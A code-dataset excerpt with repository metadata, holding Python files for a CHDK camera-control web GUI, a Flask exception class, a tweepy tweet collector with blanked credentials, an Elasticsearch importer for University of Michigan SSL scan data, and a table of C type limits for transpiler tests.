infos_label.attributes.update({"class":"Label","editor_constructor":"('Infos')","editor_varname":"infos_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.temperature_label = Label('Temp (\xb0C):')
self.temperature_label.attributes.update({"class":"Label","editor_constructor":"('Temp (ºC):')","editor_varname":"temperature_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.battery_label = Label('Batt (V):')
self.battery_label.attributes.update({"class":"Label","editor_constructor":"('Batt (V):')","editor_varname":"battery_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.connect_button = Button('Connect')
self.connect_button.style.update({"width":"100%","height":"100%"})
self.connect_button.attributes.update({"class":"Button","editor_constructor":"('Connect')","editor_varname":"connect_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.connect_button.onclick.do(self.init_camera)
lua_label = Label('Lua Execute:')
lua_label.attributes.update({"class":"Label","editor_constructor":"('Lua Execute:')","editor_varname":"lua_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.lua_value = TextInput(True,'')
self.lua_value.set_enabled(False)
self.lua_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"lua_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
self.lua_value.onchange.do(self.exec_lua)
self.status_label = Label('Camera not connected')
self.status_label.attributes.update({"class":"Label","editor_constructor":"('')","editor_varname":"status_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
container.append({'shoot_button':self.shoot_button, 'video_button':self.video_button, 'stop_button':self.stop_button, 'iso_menu':self.iso_menu, 'shutter_value':self.shutter_value, 'iso_label':iso_label, 'shutter_label':shutter_label, 'pics_value':self.pics_value, 'pics_label':pics_label, 'time_value':self.time_value, 'time_label':time_label, 'live_view_check':self.live_view_check, 'live_view_label':live_view_label, 'zoom_menu':self.zoom_menu, 'zoom_label':zoom_label, 'image':self.image, 'temperature_label':self.temperature_label, 'battery_label':self.battery_label, 'connect_button':self.connect_button, 'lua_label':lua_label, 'lua_value':self.lua_value, 'status_label':self.status_label})
self.container = container
return self.container
def set_status_label(self, text):
with self.update_lock:
self.status_label.set_text(text)
##### Here the GUI is over and starts the camera
def init_camera(self, widget):
def erase_ok(widget):
try:
device=chdkptp.list_devices()
self.camera=chdkptp.ChdkDevice(device[0])
except:
self.status_label.set_text('Error: camera not connected')
return
self.camera.switch_mode('record')
self.camera.lua_execute('set_backlight(0)')
self.camera.lua_execute('call_event_proc("UI.CreatePublic")')
self.purge_files()
self.status_label.set_text('Camera connected')
self.connect_button.set_enabled(False)
self.iso_menu.set_enabled(True)
self.shutter_value.set_enabled(True)
self.pics_value.set_enabled(True)
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.live_view_check.set_enabled(True)
self.lua_value.set_enabled(True)
self.iso_menu.set_value(self.get_iso())
self.shutter_value.set_value(str(self.get_camera_shutter_time()))
self.pics_value.set_value('1')
if self.camera.lua_execute('get_drive_mode()') == 1:
if float(self.shutter_value.get_value()) < 1:
self.time_value.set_enabled(True)
self.time_value.set_value('0')
else:
self.time_value.set_value('0')
self.temperature_label.set_text('Temp (\xb0C): '+str(self.camera.lua_execute('get_temperature(1)')))
self.battery_label.set_text('Batt (V): '+str(self.camera.lua_execute('get_vbatt()')/1000.))
erase_dialog=GenericDialog(title='WARNING',message='All your data on the camera will be erased!')
erase_dialog.style.update({"margin":"0px","width":"500px","height":"100px","top":"10px","left":"10px","position":"absolute","overflow":"auto"})
erase_dialog.show(self)
erase_dialog.confirm_dialog.do(erase_ok)
def toggle_live(self, widget, value):
if self.live_view_check.get_value():
self.zoom_menu.set_enabled(True)
else:
self.zoom_menu.set_enabled(False)
def get_iso(self):
return self.camera.lua_execute('get_iso_mode()')
def set_iso(self, widget, iso):
iso = self.iso_menu.get_value()
if iso == 'Auto':
iso='0'
self.camera.lua_execute('set_iso_mode('+iso+')')
self.camera.lua_execute('press("shoot_half")')
def get_camera_shutter_time(self):
time = self.camera.lua_execute('tv96_to_usec(get_user_tv96())')
if time < 1000000:
return time/1000000.
else:
return time/1000000
def change_shutter(self, widget, value):
try:
time=int(float(self.shutter_value.get_text())*1000000)
except:
self.status_label.set_text('Error: shutter time must be a number')
return
if time > 32000000:
time=32000000
if time < 250:
time=250
self.camera.lua_execute('set_user_tv96(usec_to_tv96('+str(time)+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.text_line_message='Done'
def purge_files(self):
for i in self.list_files():
self.camera.delete_files(i)
def list_files(self):
file_list=[]
for i in self.camera.list_files():
if 'CANONMSC' not in i:
file_list+=self.camera.list_files(i[:-1])
return file_list
def change_zoom(self, widget, zoom):
zoom = int(self.zoom_menu.get_value())
if zoom==1:
self.camera.lua_execute('post_levent_to_ui(0x11ea,0)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(True)
self.shutter_value.set_enabled(True)
if zoom==5:
self.camera.lua_execute('post_levent_to_ui(0x11ea,0)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.camera.lua_execute('post_levent_to_ui(0x11ea,1)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(False)
self.shutter_value.set_enabled(False)
if zoom==10:
self.camera.lua_execute('post_levent_to_ui(0x11ea,1)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'call_event_proc("PTM_SetCurrentItem",0x80b8,2)\n'
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(False)
self.shutter_value.set_enabled(False)
def start_shoot(self, widget):
try:
float(self.shutter_value.get_value())
float(self.time_value.get_value())
int(self.pics_value.get_value())
except:
return
self.shoot_button.set_enabled(False)
self.video_button.set_enabled(False)
self.stop_button.set_enabled(True)
self.live_view_check.set_value(False)
self.live_view_check.set_enabled(False)
tr = threading.Thread(target=self.shoot_pic, args=(self.stop_event,))
tr.start()
def start_video(self, widget):
try:
float(self.shutter_value.get_value())
float(self.time_value.get_value())
int(self.pics_value.get_value())
except:
return
if float(self.shutter_value.get_value()) < 1:
self.status_label.set_text('Video length must be at least 1 second')
return
self.shoot_button.set_enabled(False)
self.video_button.set_enabled(False)
self.stop_button.set_enabled(True)
self.live_view_check.set_value(False)
self.live_view_check.set_enabled(False)
tr = threading.Thread(target=self.shoot_video, args=(self.stop_event,))
tr.start()
def shoot_pic(self, stop_event):
record_counter = 0
timer=int(time.time())
shutter_time=str(int(numpy.rint(float(self.shutter_value.get_value())*1000000)))
        while record_counter < int(self.pics_value.get_value()) and not stop_event.is_set():
if float(self.shutter_value.get_value()) >= 1 or float(self.time_value.get_value()) == 0:
self.camera.lua_execute('set_tv96_direct(usec_to_tv96('+shutter_time+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'press("shoot_full")\n' \
'return')
else:
self.camera.lua_execute('set_tv96_direct(usec_to_tv96('+shutter_time+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'press("shoot_full")\n' \
'sleep('+str(int(numpy.rint(float(self.time_value.get_value())*1000)))+')\n' \
'release("shoot_full")\n' \
'return')
if float(self.shutter_value.get_value()) <= 1:
self.status_label.set_text('Photo '+str(record_counter+1)+' of '+str(self.pics_value.get_value()))
time.sleep(float(self.shutter_value.get_value()))
else:
seconds=0
while seconds<float(self.shutter_value.get_value()):
                    if stop_event.is_set():
self.set_status_label('Aborting, waiting '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds for the last photo')
else:
self.set_status_label('Photo '+str(record_counter+1)+' of '+str(self.pics_value.get_value())+' due in '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds')
time.sleep(1)
seconds+=1
self.set_status_label('Downloading photos from the camera')
while len(self.list_files()) == 0:
time.sleep(1)
for i in self.list_files():
localfile=i.split('/')[3]
self.camera.download_file(i,localfile)
if 'JPG' in localfile:
self.image.frame=cv2.resize(cv2.imread(localfile.split('.')[0]+'.JPG'), (720, 480))
else:
raw=rawpy.imread(localfile.split('.')[0]+'.CR2')
self.image.frame=cv2.resize(raw.postprocess(half_size=True, user_flip=False)[...,::-1], (720, 480))
raw.close()
with self.update_lock:
self.image.update(self)
self.purge_files()
record_counter += 1
stop_event.clear()
self.set_status_label('Done')
with self.update_lock:
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.stop_button.set_enabled(False)
self.live_view_check.set_enabled(True)
def shoot_video(self, stop_event):
record_counter = 0
        while record_counter < int(self.pics_value.get_value()) and not stop_event.is_set():
seconds=0
self.camera.lua_execute('press("video")')
            while seconds < float(self.shutter_value.get_value()) and not stop_event.is_set():
self.set_status_label('Video '+str(record_counter+1)+' of '+str(self.pics_value.get_value())+' due in '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds')
time.sleep(1)
seconds+=1
self.camera.lua_execute('press("video")')
self.set_status_label('Downloading video from the camera')
while self.camera.lua_execute('get_movie_status()') != 1:
time.sleep(1)
for i in self.list_files():
localfile=i.split('/')[3]
self.camera.download_file(i,localfile)
self.purge_files()
record_counter += 1
stop_event.clear()
self.set_status_label('Done')
with self.update_lock:
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.stop_button.set_enabled(False)
self.live_view_check.set_enabled(True)
def stop_action(self, widget):
        self.status_label.set_text('Aborting...')
self.stop_event.set()
def get_live_view(self):
self.camera._lua.eval("""
function()
status, err = con:live_dump_start('/tmp/live_view_frame')
for i=1,1 do
status, err = con:live_get_frame(29)
status, err = con:live_dump_frame()
end
status, err = con:live_dump_end()
return err
end
""")()
lv_aspect_ratio = {0:'LV_ASPECT_4_3', 1:'LV_ASPECT_16_9', 2:'LV_ASPECT_3_2'}
fb_type = {0:12, 1:8, 2:16, 3:16, 4:8 }
file_header_dtype = numpy.dtype([('magic','int32'),('header_size', 'int32'),('version_major', 'int32'),('version_minor','int32')])
frame_length_dtype = numpy.dtype([('length','int32')])
frame_header_dtype = numpy.dtype([('version_major','int32'),('version_minor', 'int32'),('lv_aspect_ratio', 'int32'),
('palette_type','int32'), ('palette_data_start','int32'), ('vp_desc_start','int32'), ('bm_desc_start','int32'),
('bmo_desc_start','int32')])
block_description_dtype = numpy.dtype([('fb_type','int32'),('data_start','int32'),('buffer_width','int32'),
('visible_width','int32'),('visible_height','int32'),('margin_left','int32'), ('margin_top','int32'),
('margin_right','int32'),('margin_bottom','int32')])
myFile = open('/tmp/live_view_frame','r')
file_header=numpy.fromfile(myFile, dtype=file_header_dtype, count=1)
frame_length=numpy.fromfile(myFile, dtype=frame_length_dtype, count=1)
frame_header=numpy.fromfile(myFile, dtype=frame_header_dtype, count=1)
vp_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
vp_bpp = fb_type[int(vp_description['fb_type'])]
        vp_frame_size=vp_description['buffer_width']*vp_description['visible_height']*vp_bpp/8 # in bytes
vp_frame_size = int(vp_frame_size[0])
bm_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
bm_bpp = fb_type[int(bm_description['fb_type'])]
bm_frame_size=bm_description['buffer_width']*bm_description['visible_height']*bm_bpp/8
bm_frame_size = int(bm_frame_size[0])
bmo_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
bmo_bpp = fb_type[int(bmo_description['fb_type'])]
bmo_frame_size=bmo_description['buffer_width']*bmo_description['visible_height']*bmo_bpp/8
bmo_frame_size = int(bmo_frame_size[0])
if vp_description['data_start'] > 0:
vp_raw_img=numpy.fromfile(myFile, dtype=numpy.uint8, count=vp_frame_size)
y=vp_raw_img[1::2].reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
u=numpy.empty(vp_frame_size//2, dtype=numpy.uint8)
u[0::2]=vp_raw_img[0::4]
u[1::2]=vp_raw_img[0::4]
u=u.reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
v=numpy.empty(vp_frame_size//2, dtype=numpy.uint8)
v[0::2]=vp_raw_img[2::4]
v[1::2]=vp_raw_img[2::4]
v=v.reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
raw_yuv=numpy.dstack((y,u,v))[:,0:int(vp_description['visible_width']),:]
vp_rgb=cv2.cvtColor(raw_yuv, cv2.COLOR_YUV2BGR)
if bm_description['data_start'] > 0:
bm_raw_img=numpy.fromfile(myFile, dtype=numpy.uint8, count=bm_frame_size)
y=bm_raw_img[1::2].reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
u=numpy.empty(bm_frame_size//2, dtype=numpy.uint8)
u[0::2]=bm_raw_img[0::4]
u[1::2]=bm_raw_img[0::4]
u=u.reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
v=numpy.empty(bm_frame_size//2, dtype=numpy.uint8)
v[0::2]=bm_raw_img[2::4]
v[1::2]=bm_raw_img[2::4]
v=v.reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
raw_yuv=numpy.dstack((y,u,v))[:,0:int(bm_description['visible_width']),:]
bm_rgb=cv2.cvtColor(raw_yuv, cv2.COLOR_YUV2BGR)
if bmo_description['data_start'] >0:
bmo_raw_img=numpy.fromfile(myFile, dtype=numpy.int32, count=bmo_frame_size)
myFile.close()
if vp_rgb.shape[0]==408: # Workaround for video mode
extension=numpy.zeros((480,720,3))
extension[36:444, :, :]=vp_rgb # (480-408)/2:480-(480-408)/2, :, :
vp_rgb=extension
return vp_rgb, bm_rgb
def exec_lua(self, widget, value):
try:
self.camera.lua_execute(str(self.lua_value.get_value())+'\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.status_label.set_text('Done')
except:
self.status_label.set_text('Error executing LUA')
if __name__ == "__main__":
start(M10GUI, address='0.0.0.0', port=8081, multiple_instance=False, enable_file_cache=True, start_browser=False, debug=False, update_interval = 0.01)
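# A minimal sketch (not part of the GUI above) of the exposure-time arithmetic the
# shooting code uses: the GUI value is in seconds, while CHDK's usec_to_tv96() Lua
# helper expects microseconds, so the value is rounded to a whole microsecond count
# before being spliced into the Lua source. The helper name below is hypothetical.
import numpy

def shutter_seconds_to_usec_string(seconds):
    # round rather than truncate, matching the numpy.rint calls above
    return str(int(numpy.rint(float(seconds) * 1000000)))

assert shutter_seconds_to_usec_string(0.5) == '500000'
assert shutter_seconds_to_usec_string('2') == '2000000'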
| 58.376866
| 703
| 0.577245
| 30,947
| 0.989006
| 0
| 0
| 11,213
| 0.358346
| 0
| 0
| 11,244
| 0.359337
|
b1a00da7893518e48125fe8f8ffac5ec512f86f7
| 781
|
py
|
Python
|
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
from werkzeug.exceptions import HTTPException
class APIException(HTTPException):
    def __init__(self, msg='Client error', code=400, err_code=900, headers=None):
self.msg = msg
self.code = code
self.err_code = err_code
super(APIException, self).__init__(msg, None)
'''
Custom info return.
'''
# def __repr__(self):
# return '<APIException>: {}--{}'.format(self.code, self.msg)
# def __str__(self):
# return '<APIException>: {}--{}'.format(self.code, self.msg)
class ServerException(APIException):
    def __init__(self, msg='Server error', code=500, err_code=999):
self.msg = msg
self.code = code
self.err_code = err_code
super(ServerException, self).__init__(msg, code, err_code, None)
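# A minimal usage sketch (not part of the module): deriving a concrete error from
# APIException and raising it from application code. NotFound, its codes, and
# get_post() are hypothetical illustrations, not part of this blog server's API.
class NotFound(APIException):
    def __init__(self, msg='Resource not found', code=404, err_code=1001):
        super(NotFound, self).__init__(msg, code, err_code)

def get_post(posts, post_id):
    # a Flask error handler can then serialize msg/code/err_code into one JSON shape
    if post_id not in posts:
        raise NotFound()
    return posts[post_id]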
| 32.541667
| 74
| 0.627401
| 752
| 0.938826
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.299625
|
b1a21975ae4f7b1e5e6eec59130eae251c21b5f0
| 2,159
|
py
|
Python
|
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
import json
import csv
import tweepy
from textblob import TextBlob
import nltk
from nltk.tokenize import word_tokenize
def search_for_hashtags(consumer_key, consumer_secret, access_token, access_token_secret, hashtag_phrase):
# create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# initialize Tweepy API
api = tweepy.API(auth)
# get the name of the spreadsheet we will write to
fname = "data"
string = " "
# open the spreadsheet we will write to
with open('%s.csv' % fname, 'w') as file:
w = csv.writer(file)
# write header row to spreadsheet
w.writerow(['timestamp', 'tweet_text', 'username',
'all_hashtags', 'followers_count', 'location'])
# for each tweet matching our hash tags, write relevant info to the spreadsheet
i = 1
for tweet in tweepy.Cursor(api.search, q=hashtag_phrase + ' -filter:retweets',
lang="en", tweet_mode='extended').items(5000):
string = string + tweet.full_text.replace('\n', ' ')
w.writerow([tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
print(i , [tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
i = i+1
print("Done")
#string = word_tokenize(string)
# print(nltk.pos_tag(string))
if __name__ == '__main__':
    consumer_key = ''  # credentials removed from the source; supply your own keys
    consumer_secret = ''
    access_token = ''
    access_token_secret = ''
hashtag_phrase = 'geocode:27.466079,89.639010,30km'
search_for_hashtags(consumer_key, consumer_secret,
access_token, access_token_secret, hashtag_phrase)
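# TextBlob and nltk are imported above but never used; this is a minimal sketch of
# the sentiment pass they hint at, run over the spreadsheet that
# search_for_hashtags() writes. The function name is hypothetical; 'tweet_text'
# matches the header row written above.
def mean_tweet_polarity(fname='data'):
    polarities = []
    with open('%s.csv' % fname) as f:
        for row in csv.DictReader(f):
            # polarity ranges over [-1, 1], negative to positive sentiment
            polarities.append(TextBlob(row['tweet_text']).sentiment.polarity)
    return sum(polarities) / len(polarities) if polarities else 0.0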
| 38.553571
| 131
| 0.637332
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 607
| 0.281149
|
b1a2e9e876bf7788f4968b9eb3b29a91a90c21c3
| 9,585
|
py
|
Python
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 36
|
2015-10-14T21:17:16.000Z
|
2022-01-21T16:34:24.000Z
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 5
|
2015-10-19T13:47:55.000Z
|
2017-06-21T07:12:41.000Z
|
umich_daily.py
|
mpars0ns/scansio-sonar-es
|
ea7b1928277317b97c84443812da01af99ef0feb
|
[
"BSD-3-Clause"
] | 8
|
2016-04-28T09:34:20.000Z
|
2022-01-21T16:34:23.000Z
|
import argparse
import sys
from multiprocessing import cpu_count, Process, Queue
import json
import logging
from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk, scan
import hashlib
from helpers.certparser import process_cert
from helpers.hostparser import proccess_host
logger = logging.getLogger('SSLImporter')
logger_format = logging.Formatter('\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():%(lineno)d %(asctime)s\033[0m| '
'%(message)s')
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(logger_format)
logger.addHandler(stream_handler)
elastic_logger = logging.getLogger('elasticsearch')
elastic_logger.addHandler(stream_handler)
DEFAULT_SERVER = u'localhost'
DEFAULT_PORT = 9200
def process_scan_certs(q, es):
"""
:param q: The Queue object that certs should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:return:
"""
bulk_certs = []
while True:
certs = q.get()
if certs == "DONE":
bulk(es, bulk_certs)
return True
for cert in certs['certs']:
newcert = process_cert(cert)
if newcert:
newcert['import_date'] = certs['time']
newcert['source'] = 'umich'
newcert_action = {"_index": "passive-ssl-certs-umich", "_type": "cert", '_id': newcert['hash_id'],
'_source': newcert}
bulk_certs.append(newcert_action)
if len(bulk_certs) == 500:
bulk(es, bulk_certs)
bulk_certs = []
def process_hosts(q, es, initial):
"""
:param q: The Queue object that hosts should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
    :param initial: If this is the initial upload then we set the first_seen = last_seen. Otherwise first_seen is left
blank and will be cleaned up later
:return:
"""
bulk_hosts = []
while True:
line = q.get()
if line == "DONE":
bulk(es, bulk_hosts)
return True
host = proccess_host(line)
cert_hash = hashlib.sha1(host['host']+host['hash']+host['source'])
cert_hash = cert_hash.hexdigest()
if initial:
host['first_seen'] = host['last_seen']
action = {"_op_type": "update", "_index": 'passive-ssl-hosts-umich', "_type": "host", "_id": cert_hash,
"doc": line, "doc_as_upsert": "true"}
bulk_hosts.append(action)
if len(bulk_hosts) == 500:
bulk(es, bulk_hosts)
bulk_hosts = []
def parse_scanfile(f, host_queue, cert_queue):
"""
:param f: json file from University of Michigan that has been lz4 decompressed.
:param host_queue: Queue to send host info to
:param cert_queue: Queue to send cert info to
:return:
"""
certs_set = set()
with open(f) as scan_file:
for line in scan_file:
item = json.loads(line)
item['log'].pop(0)
for entry in item['log']:
if entry['data']:
if 'server_certificates' in entry['data'] and entry['data']['server_certificates'] is not None:
if entry['data']['server_certificates']['certificate'] is not None:
if 'fingerprint_sha1' in entry['data']['server_certificates']['certificate']:
server_cert = entry['data']['server_certificates']['certificate']['fingerprint_sha1']
doc = {'host': item['host'], 'source': 'umich', 'last_seen': item['time'],
'hash': server_cert}
host_queue.put(doc)
if server_cert in certs_set:
pass # We already have this sha1 and we don't need to attempt parsing it
else:
if entry['data']['server_certificates']['certificate'] is not None:
if 'raw' in entry['data']['server_certificates']:
raw_cert = dict()
raw_cert['time'] = item['time']
raw_cert['certs'] = entry['data']['server_certificates']['raw']
else:
raw_cert = None
if raw_cert:
cert_queue.put(raw_cert)
certs_set.add(server_cert) # We have added this hash to be processed so we
# don't need to process it again
print "Finished processing file....now printing the length of the certs set"
print len(certs_set)
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--server', default=DEFAULT_SERVER,
help=u'Elasticsearch hostname or IP (default {0})'.format(DEFAULT_SERVER))
parser.add_argument('--port', default=DEFAULT_PORT,
help=u'Elasticsearch port (default {0})'.format(DEFAULT_PORT))
parser.add_argument('--scanfile', help=u'Path to umich scan file you are ingesting. '
u'Please make sure to decompress it')
parser.add_argument('--initial', help=u'If this is the first file you are importing please use this flag',
action='store_true')
args = parser.parse_args(argv[1:])
if args.scanfile is None:
logger.error("Please include a scanfile")
sys.exit(1)
workers = cpu_count()
process_hosts_queue = Queue(maxsize=20000)
process_certs_queue = Queue(maxsize=20000)
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_hosts, args=(process_hosts_queue, es, args.initial))
p.daemon = True
p.start()
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_scan_certs, args=(process_certs_queue, es))
p.daemon = True
p.start()
logger.warning("Starting processing of {file} at {date}".format(file=args.scanfile, date=datetime.now()))
# This is the bottle neck of the process but it works for now
parse_scanfile(args.scanfile, process_hosts_queue, process_certs_queue)
# Once all the json lines have been put onto the queue. Add DONE so the queue workers know when to quit.
for w in xrange(workers):
process_hosts_queue.put("DONE")
process_certs_queue.put("DONE")
# Close out the queue we are done
process_hosts_queue.close()
process_hosts_queue.join_thread()
process_certs_queue.close()
process_certs_queue.join_thread()
# this is kinda dirty but without looking up everything at insert time (slow) I don't know of a better way to do
# this based on the number of documents we will have
refresh_es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
# construct an elasticsearch query where the filter is looking for any entry that is missing the field first_seen
q = {'size': 500, "query": {"match_all": {}}, "filter": {"missing": {"field": "first_seen"}}}
new_updates = refresh_es.search(index='passive-ssl-hosts-umich', body=q)
logger.warning("Numer of hosts to update is {count}".format(count=new_updates['hits']['total']))
# Scan across all the documents missing the first_seen field and bulk update them
missing_first_seen = scan(refresh_es, query=q, scroll='30m', index='passive-ssl-hosts-umich')
bulk_miss = []
for miss in missing_first_seen:
last_seen = miss['_source']['last_seen']
first_seen = last_seen
action = {"_op_type": "update", "_index": "passive-ssl-hosts-umich", "_type": "host", "_id": miss['_id'],
"doc": {'first_seen': first_seen}}
bulk_miss.append(action)
if len(bulk_miss) == 500:
bulk(refresh_es, bulk_miss)
bulk_miss = []
    # Get the remaining ones (fewer than 500) left over after the loop has ended
bulk(refresh_es, bulk_miss)
logger.warning("{file} import finished at {date}".format(file=args.scanfile, date=datetime.now()))
# Now we should optimize each index to max num segments of 1 to help with searching/sizing and just over all
# es happiness
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-hosts-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-hosts-umich', max_num_segments=1, request_timeout=7500)
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-certs-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-certs-umich', max_num_segments=1, request_timeout=7500)
if __name__ == "__main__":
main(sys.argv)
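# A minimal standalone sketch of the first_seen backfill performed at the end of
# main(): scan for documents missing the field and upsert first_seen = last_seen.
# It assumes the same legacy (1.x-era) Elasticsearch query DSL the script already
# uses; the function name is hypothetical.
def backfill_first_seen(es, index='passive-ssl-hosts-umich'):
    q = {"query": {"match_all": {}},
         "filter": {"missing": {"field": "first_seen"}}}
    actions = ({"_op_type": "update", "_index": index, "_type": "host",
                "_id": hit['_id'],
                "doc": {"first_seen": hit['_source']['last_seen']}}
               for hit in scan(es, query=q, scroll='30m', index=index))
    bulk(es, actions)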
| 45.212264
| 119
| 0.605842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,666
| 0.382473
|
b1a35e06a9245c638232ac973c3cdcca21d276f6
| 980
|
py
|
Python
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 12
|
2021-08-05T12:12:09.000Z
|
2022-03-08T13:33:53.000Z
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 26
|
2021-08-23T10:25:37.000Z
|
2022-03-30T12:56:08.000Z
|
project/tests/scripts/system_vars.py
|
LeDron12/c2eo
|
4f0dc6ed79df0739bd834eda6a0f77f3caf4292c
|
[
"MIT"
] | 12
|
2021-08-17T09:20:07.000Z
|
2022-03-31T13:37:28.000Z
|
integer = [
['lld', 'long long', 9223372036854775807, -9223372036854775808],
['ld', 'long', 9223372036854775807, -9223372036854775808],
['lu', 'unsigned long', 18446744073709551615, 0],
['d', 'signed', 2147483647, -2147483648],
['u', 'unsigned', 4294967295, 0],
['hd', 'short', 32767, -32768],
['hu', 'unsigned short', 65535, 0],
['c', 'char', 127, -128],
['c', 'unsigned char', 255, 0],
['d', '_Bool', 1, 0],
]
real = [
['f', 'float', 3.40282e+38, -3.40282e+38],
['f', 'double', 1.79769e+308, -1.79769e+308],
['Lf', 'long double', 1.79769e+308, -1.79769e+308]
]
# todo: fix path
path = ''
directory = 'env'
filename1 = f'{directory}/code1.c'
filename2 = f'{directory}/code2.c'
logfile1 = f'{directory}/log1.txt'
logfile2 = f'{directory}/log2.txt'
eo_out = f'{directory}/eo_out.txt'
c_out = f'{directory}/c_out.txt'
c_bin = f'{directory}/a.out'
launcher = '../../bin/launcher.py'
full_log = None
resultDir = '../../../result'
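# A minimal sketch of how these tables can be consumed: each row is
# (printf format specifier, C type name, max value, min value), which is enough to
# emit boundary-value statements for a generated C test source. The function name
# is hypothetical.
def emit_bounds_checks(rows):
    lines = []
    for fmt, ctype, vmax, vmin in rows:
        for value in (vmax, vmin):
            lines.append('{ %s x = %s; printf("%%%s\\n", x); }' % (ctype, value, fmt))
    return '\n'.join(lines)

# e.g. emit_bounds_checks(integer[5:6]) emits checks for short's 32767/-32768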
| 29.69697
| 68
| 0.596939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 397
| 0.405102
|
b1a435a669f2409d097f7f74a5d9ca3c12d7e85f
| 1,944
|
py
|
Python
|
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
